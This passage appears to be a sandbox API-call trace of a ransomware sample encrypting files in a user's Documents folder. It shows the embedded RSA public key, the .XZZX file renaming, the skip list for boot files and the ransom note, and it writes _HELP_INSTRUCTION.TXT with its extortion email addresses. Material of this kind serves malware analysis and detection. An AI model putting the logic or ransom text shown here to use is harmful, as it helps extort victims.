(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0235.130] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0235.130] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.130] lstrcpyW (in: lpString1=0x17addc, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0235.131] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11b8 [0235.131] Sleep (dwMilliseconds=0x96) [0235.285] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0235.285] lstrcmpW (lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpString2="..") returned 1 [0235.285] lstrcmpW (lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpString2=".") returned 1 [0235.285] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0235.285] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="ntldr") returned 0x0 [0235.285] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="NTLDR") returned 0x0 [0235.285] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0235.285] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0235.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0235.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0235.285] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0235.285] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.285] lstrcpyW (in: lpString1=0x17addc, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0235.285] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11bc [0235.285] Sleep (dwMilliseconds=0x96) [0235.440] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0235.440] lstrcmpW (lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpString2="..") returned 1 [0235.440] lstrcmpW (lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpString2=".") returned 1 [0235.440] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0235.440] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="ntldr") returned 0x0 [0235.440] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="NTLDR") returned 0x0 [0235.441] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0235.441] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0235.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0235.441] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0235.441] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0235.441] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.441] lstrcpyW (in: lpString1=0x17addc, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0235.441] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c0 [0235.441] Sleep (dwMilliseconds=0x96) [0235.598] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0235.598] lstrcmpW (lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpString2="..") returned 1 [0235.598] lstrcmpW (lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpString2=".") returned 1 [0235.598] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0235.598] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="ntldr") returned 0x0 [0235.598] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="NTLDR") returned 0x0 [0235.598] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0235.598] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="ntdetect.com") returned 0x0 [0235.598] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0235.598] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0235.598] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0235.598] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.598] lstrcpyW (in: lpString1=0x17addc, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0235.598] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c4 [0235.598] Sleep (dwMilliseconds=0x96) [0235.752] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0235.752] lstrcmpW (lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpString2="..") returned 1 [0235.752] lstrcmpW (lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpString2=".") returned 1 [0235.752] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0235.752] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="ntldr") returned 0x0 [0235.753] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="NTLDR") returned 0x0 [0235.753] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0235.753] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="ntdetect.com") returned 0x0 [0235.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0235.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0235.753] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0235.753] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.753] lstrcpyW (in: lpString1=0x17addc, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0235.753] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c8 [0235.753] Sleep (dwMilliseconds=0x96) [0235.908] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0235.908] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0235.908] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0235.909] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0235.909] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0235.909] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0235.909] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0235.909] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0235.909] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0235.909] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0235.909] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0235.909] SetErrorMode (uMode=0x1) returned 0x1 [0235.909] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT") returned 98 [0235.909] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0235.909] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0235.910] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x11cc) returned 0x0 [0235.910] RegQueryValueExW (in: hKey=0x11cc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d43f8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43d43f8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0235.910] RegCloseKey (hKey=0x11cc) returned 0x0 [0235.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0235.910] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0235.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11cc [0235.910] CloseHandle (hObject=0x11cc) returned 1 [0235.910] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0235.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0235.910] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0235.911] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0235.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0235.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0235.911] SetErrorMode (uMode=0x1) returned 0x1 [0235.911] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0235.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0235.911] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0235.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0235.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0235.911] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0235.911] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0235.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" 